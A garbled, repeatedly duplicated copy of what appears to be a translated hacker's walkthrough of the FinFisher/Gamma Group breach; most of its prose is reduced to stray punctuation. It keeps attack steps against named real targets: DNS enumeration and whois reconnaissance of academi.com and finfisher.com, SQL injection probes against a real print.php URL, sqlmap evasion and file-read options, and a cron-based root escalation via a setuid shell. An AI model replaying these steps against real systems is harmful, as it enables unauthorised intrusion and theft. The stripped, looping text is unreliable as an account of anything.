WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
